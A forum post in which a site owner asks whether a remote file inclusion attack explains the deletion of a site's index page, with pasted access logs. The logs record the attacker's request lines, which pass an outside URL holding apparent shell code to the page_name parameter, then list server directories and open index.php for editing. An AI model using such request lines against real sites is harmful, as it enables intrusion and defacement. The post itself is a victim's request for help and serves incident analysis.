Jump to content

I got hacked. Is this the reason?

jandrox_ox

By jandrox_ox
in Miscellaneous

 Share

Recommended Posts

jandrox_ox Newbie

jandrox_ox

Posted
Posted

A website I helped built got recently hacked (the index page got deleted). I checked the permission of folders, all 755. In the access logs I see someone trying to access this url:

 

/index.php?page_name=http://freewebs.com/xugurx/ugur.txt?

 

Normally, the page_name variable tells the system from what table to load the information (all the web's info is loaded from a DB).  The person that coded the index page did not check the input (I told him to only accept alpha numerical characters but...). Do you think this is the way the website got hacked? Here are more of the same session's access logs.

 

**Can anyone tell me how to fix this (apart from the obvious filtering the input to make sure that it is only alpha-numerical). Could you also recommend me a good tutorial/book on php/web security, I am planing on re-writing the whole system using the cakephp framework and I want to make sure this doesn't happen again.

 

Host: 85.105.132.102


    *  


/index.php?page_name=Fundraising
Http Code: 200 	Date: Dec 06 07:07:30 	Http Version: HTTP/1.1 	Size in Bytes: 15749
Referer: http://www.google.com.tr/search?hl=tr&q=%22Failed+Opening%22inurl%3A%3D%22citizens%22&
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?act=ls&d=%2Fetc%2Fvdomainaliases%2F
Http Code: 200 	Date: Dec 06 07:15:37 	Http Version: HTTP/1.1 	Size in Bytes: 18328
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/universal.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/normalize.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/header.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/nav.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/mod_css.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/bill.jpg
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/caption.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/esstyle.css
Http Code: 304 	Date: Dec 06 07:17:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/overLIB/overlib_mini.js
Http Code: 304 	Date: Dec 06 07:17:25 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/logo_csj_small.png
Http Code: 304 	Date: Dec 06 07:17:25 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_col_left.gif
Http Code: 304 	Date: Dec 06 07:17:26 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_col_right.gif
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/wilber%20pic.jpg
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/slideshow/AC_RunActiveContent.js
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_content.gif
Http Code: 304 	Date: Dec 06 07:17:28 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/slideshow.swf
Http Code: 304 	Date: Dec 06 07:17:28 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/rights.jpg
Http Code: 304 	Date: Dec 06 07:17:31 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/kennedy_thumb.jpg
Http Code: 304 	Date: Dec 06 07:17:31 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/images.txt
Http Code: 304 	Date: Dec 06 07:17:33 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/American_Flag_2.jpg
Http Code: 304 	Date: Dec 06 07:17:34 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/b_make_donation.jpg
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_cal_expand.gif
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/paine.jpg
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/monthBg.gif
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/b_get_involved.jpg
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/dayBg.gif
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/common.jpg
Http Code: 304 	Date: Dec 06 07:17:39 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/header.jpg
Http Code: 304 	Date: Dec 06 07:17:41 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic4.jpg
Http Code: 304 	Date: Dec 06 07:17:43 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/education.jpg
Http Code: 304 	Date: Dec 06 07:17:44 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/magna.jpg
Http Code: 304 	Date: Dec 06 07:17:47 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/MartinLutherKingJr.jpg
Http Code: 304 	Date: Dec 06 07:17:51 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/pov%20pic2.jpg
Http Code: 304 	Date: Dec 06 07:17:52 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/rawls.jpg
Http Code: 304 	Date: Dec 06 07:17:55 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/kenn.bmp
Http Code: 304 	Date: Dec 06 07:17:59 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic1.jpg
Http Code: 304 	Date: Dec 06 07:18:00 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/vote.jpg
Http Code: 304 	Date: Dec 06 07:18:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic2.jpg
Http Code: 304 	Date: Dec 06 07:18:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/the%20wall.jpg
Http Code: 304 	Date: Dec 06 07:18:11 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/fdoug.jpg
Http Code: 304 	Date: Dec 06 07:18:16 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lib%20pic1.jpg
Http Code: 304 	Date: Dec 06 07:18:16 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/sac.jpg
Http Code: 304 	Date: Dec 06 07:18:19 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/htub.jpg
Http Code: 304 	Date: Dec 06 07:18:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lib%20pic3.jpg
Http Code: 304 	Date: Dec 06 07:18:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/arlington.jpg
Http Code: 304 	Date: Dec 06 07:18:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lincoln.jpg
Http Code: 304 	Date: Dec 06 07:18:32 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic3.jpg
Http Code: 304 	Date: Dec 06 07:18:32 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/flag.jpg
Http Code: 304 	Date: Dec 06 07:18:38 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?act=ls&d=%2Fhome%2Fayovan%2Fpublic_html%2F
Http Code: 200 	Date: Dec 06 07:18:38 	Http Version: HTTP/1.1 	Size in Bytes: 18349
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/tmarsh.jpg
Http Code: 304 	Date: Dec 06 07:18:40 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/christ.jpg
Http Code: 304 	Date: Dec 06 07:18:48 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=sort_asc
Http Code: 200 	Date: Dec 06 07:18:47 	Http Version: HTTP/1.1 	Size in Bytes: 11094
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=small_dir
Http Code: 200 	Date: Dec 06 07:18:47 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_lnk
Http Code: 200 	Date: Dec 06 07:18:48 	Http Version: HTTP/1.1 	Size in Bytes: 11085
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_ftpquota
Http Code: 200 	Date: Dec 06 07:18:49 	Http Version: HTTP/1.1 	Size in Bytes: 11137
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_js
Http Code: 200 	Date: Dec 06 07:18:50 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_htaccess
Http Code: 200 	Date: Dec 06 07:18:52 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_error_log
Http Code: 200 	Date: Dec 06 07:18:53 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_zip
Http Code: 200 	Date: Dec 06 07:18:54 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_css
Http Code: 200 	Date: Dec 06 07:18:55 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/libbell.jpg
Http Code: 304 	Date: Dec 06 07:18:56 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_swf
Http Code: 200 	Date: Dec 06 07:18:55 	Http Version: HTTP/1.1 	Size in Bytes: 11094
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=arrow_ltr
Http Code: 200 	Date: Dec 06 07:18:56 	Http Version: HTTP/1.1 	Size in Bytes: 11085
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http://freewebs.com/xugurx/140.txt?
Http Code: 200 	Date: Dec 06 07:18:52 	Http Version: HTTP/1.1 	Size in Bytes: 83494
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/dec.jpg
Http Code: 206 	Date: Dec 06 07:19:04 	Http Version: HTTP/1.1 	Size in Bytes: 1893374
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/wetp.jpg
Http Code: 304 	Date: Dec 06 07:19:15 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=f&f=index.php&ft=edit&am
Http Code: 200 	Date: Dec 06 07:19:20 	Http Version: HTTP/1.1 	Size in Bytes: 53061
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/vietnam.jpg
Http Code: 206 	Date: Dec 06 07:20:00 	Http Version: HTTP/1.1 	Size in Bytes: 203714
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=home
Http Code: 200 	Date: Dec 06 07:20:38 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=back
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=forward
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=up
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=refresh
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=search
Http Code: 200 	Date: Dec 06 07:20:40 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=buffer
Http Code: 200 	Date: Dec 06 07:20:40 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_php
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_html
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_txt
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_diz
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_exe
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_gif
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/cicero.jpg
Http Code: 304 	Date: Dec 06 07:20:43 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_ini
Http Code: 200 	Date: Dec 06 07:20:49 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=download
Http Code: 200 	Date: Dec 06 07:20:49 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_rtf
Http Code: 200 	Date: Dec 06 07:20:50 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


